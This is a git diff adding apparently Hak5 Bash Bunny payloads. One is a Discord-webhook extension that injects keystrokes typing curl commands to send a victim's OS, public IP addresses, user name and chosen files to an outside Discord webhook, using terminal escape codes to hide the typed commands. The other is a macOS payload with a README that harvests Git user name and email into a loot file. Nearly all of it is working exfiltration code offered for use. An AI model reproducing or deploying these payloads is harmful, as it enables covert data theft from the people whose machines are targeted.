hak5 · hak5peaks · Sep 3, 2024 · Jul 31, 2023 · Aug 20, 2023 · Sep 2, 2024
diff --git a/payloads/extensions/discord.sh b/payloads/extensions/discord.sh
@@ -0,0 +1,86 @@
+#!/bin/bash
+#
+# Title:         Discord Extension
+# Description:   Interact with discord webhook to exfiltrate text or files
+# Author:        quentin_lamamy <[email protected]>
+# Version:       1.0
+# Category:      Extension
+# 
+# To use this extension, you need to create a webhook on discord and get the webhook id and token
+# During your setup steps, you need to set the DISCORD_WEBHOOK_ID and DISCORD_WEBHOOK_TOKEN variables
+# DISCORD_WEBHOOK_ID="<DISCORD_WEBHOOK_ID>""
+# DISCORD_WEBHOOK_TOKEN="<DISCORD_WEBHOOK_TOKEN>"
+
+function DISCORD() {
+
+    case $1 in
+
+        # @desc  Initialize the exfiltration session by posting an embed message on discord with host information
+        # @usage DISCORD INIT
+        # @info  This command need a $BB_HOST_* variables (Set by default if you use my OSX extension)
+        "INIT")
+
+            curl_location="https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN"
+            curl_header="Content-Type: application/json"
+
+            Q STRING "printf '\e7'"
+            Q ENTER
+            Q STRING "curl --location '$curl_location'"
+            Q STRING " --header '$curl_header'"
+            Q STRING " --data '{\"embeds\": [{\"author\": {\"name\": \"New exfiltration session\",\"icon_url\": \"https://cdn-icons-png.flaticon.com/512/2/2235.png\"},\"color\": \"15258703\",\"fields\": [{\"name\":\"OS\",\"value\":\""
+            Q STRING "'\${BB_HOST_OS}'"
+            Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
+            Q STRING "'\${BB_HOST_IP_V4}'"
+            Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
+            Q STRING "'\${BB_HOST_IP_V6}'"
+            Q STRING "\",\"inline\":true},{\"name\":\"User\",\"value\":\""
+            Q STRING "'\${BB_HOST_USER}'"
+            Q STRING "\",\"inline\":true}]"
+            Q STRING "}]}'"
+            Q ENTER
+            Q STRING "printf '\e8\e[1A\e[0J'"
+            Q ENTER
+
+        ;;
+
+        "SEND")
+
+            case $2 in
+
+                # @desc  Send a message to discord via webhook
+                # @usage DISCORD SEND MSG $yourMessage
+                "MSG")
+
+                    if [[ "$3" == *"$"* ]]; then
+                        message="'$3'"
+                    else
+                        message=$3
+                    fi
+
+                    Q STRING "printf '\e7'"
+                    Q ENTER
+                    Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --header 'Content-Type: application/json' --data '{\"content\": \"$message\"}' && printf '\e[3A\e[K\e[0J'"
+                    Q ENTER
+                    Q STRING "printf '\e8\e[1A\e[0J'"
+                    Q ENTER
+                ;;
+
+                # @desc  Send a file to discord via webhook
+                # @usage DISCORD SEND FILE $yourFilePath
+                "FILE")
+                    Q STRING "printf '\e7'"
+                    Q ENTER                
+                    Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --form '=@\"$3\"' && printf '\e[3A\e[K\e[0J'"
+                    Q ENTER
+                    Q STRING "printf '\e8\e[1A\e[0J'"
+                    Q ENTER                    
+                ;;
+
+            esac
+
+        ;;
+
+    esac
+}
+
+export -f DISCORD
diff --git a/payloads/library/exfiltration/githubExfiltration/README.md b/payloads/library/exfiltration/githubExfiltration/README.md
@@ -0,0 +1,30 @@
+<div align="center">
+
+# Github Information Exfiltration
+**Get Git user name and email from the Git global config and exfiltrate them**
+
+![Bash](https://img.shields.io/badge/Shell_Script-121011?style=for-the-badge&logo=gnu-bash&logoColor=white)
+![Quack](https://img.shields.io/badge/Ducky_Script-121011?style=for-the-badge&logo=duck&logoColor=white)
+
+![OSX](https://img.shields.io/badge/OSX-FFFFFF?style=for-the-badge&logo=apple&logoColor=black)
+
+</div>
+
+<img width="1000" alt="banner" src="https://raw.githubusercontent.com/quentinlamamy/bashbunny/main/img/githubExfiltration.jpg"/>
+
+# Dependency
+
+* OSX Extension by quentin_lamamy
+
+# Changelog
+v1.0 : 
+* :tada: Release on 2023/08/20
+
+# Contributing
+A bug ? An idea of feature ? [Fill an issue on github](https://github.com/quentinlamamy/bashbunny/issues)
+
+# License
+<p xmlns:cc="http://creativecommons.org/ns#" xmlns:dct="http://purl.org/dc/terms/"><a property="dct:title" rel="cc:attributionURL" href="https://github.com/quentinlamamy/bashbunny/blob/main/payloads/githubExfiltration/payload.txt">Github Infos Exfiltration Payload</a> by <a rel="cc:attributionURL dct:creator" property="cc:attributionName" href="https://github.com/quentinlamamy">Quentin Lamamy</a> is licensed under <a href="http://creativecommons.org/licenses/by-nc-sa/4.0/?ref=chooser-v1" target="_blank" rel="license noopener noreferrer" style="display:inline-block;">CC BY-NC-SA 4.0<img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/nc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/sa.svg?ref=chooser-v1"></a></p>
+
+# Support
+<a href="https://www.buymeacoffee.com/quentinlamamy" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-orange.png" alt="Buy Me A Coffee" height="41" width="174"></a>
diff --git a/payloads/library/exfiltration/githubExfiltration/payload.txt b/payloads/library/exfiltration/githubExfiltration/payload.txt
@@ -0,0 +1,58 @@
+#!/bin/bash
+#
+# Title:         OSX Payload to exfiltrate Git user name and email
+# Description:   Get Git user name and email from the Git global config and exfiltrate them
+# Author:        quentin_lamamy <[email protected]>
+# Version:       1.0
+# Category:      Exfiltration
+# Attackmodes:   HID STORAGE
+# Target OS:     OSX
+# Dependency:    OSX Extensions
+#
+# Magenta solid           Setup
+# Yellow single blink     Attack in progress
+# Yellow double blink     Sync
+# Yellow triple blink     Cleanup
+# Green blink then solid  Finished
+
+LED SETUP
+
+ATTACKMODE STORAGE HID VID_0X05AC PID_0X0250
+
+OSX TERMINAL OPEN
+
+Q STRING 'last_mounted_volume=$(ls -t /Volumes | head -n 1)'
+Q ENTER
+Q STRING 'lootPath=/Volumes/$last_mounted_volume/loot/gitInfos.txt'
+Q ENTER
+Q STRING 'touch $lootPath'
+Q ENTER
+
+LED ATTACK
+
+# Get the user name from the Git global config
+Q STRING 'user_name=$(git config --global user.name)'
+Q ENTER
+
+# Get the user email from the Git global config
+Q STRING 'user_email=$(git config --global user.email)'
+Q ENTER
+
+Q STRING 'echo -e "Username: $user_name\nMail: $user_email" > $lootPath'
+Q ENTER
+
+# Sync
+LED STAGE 2
+sync
+
+# Cleanup
+LED STAGE 3
+
+# Eject
+QUACK STRING 'diskutil eject $last_mounted_volume'
+QUACK ENTER
+DELAY 100
+
+OSX TERMINAL CLOSE
+
+LED FINISH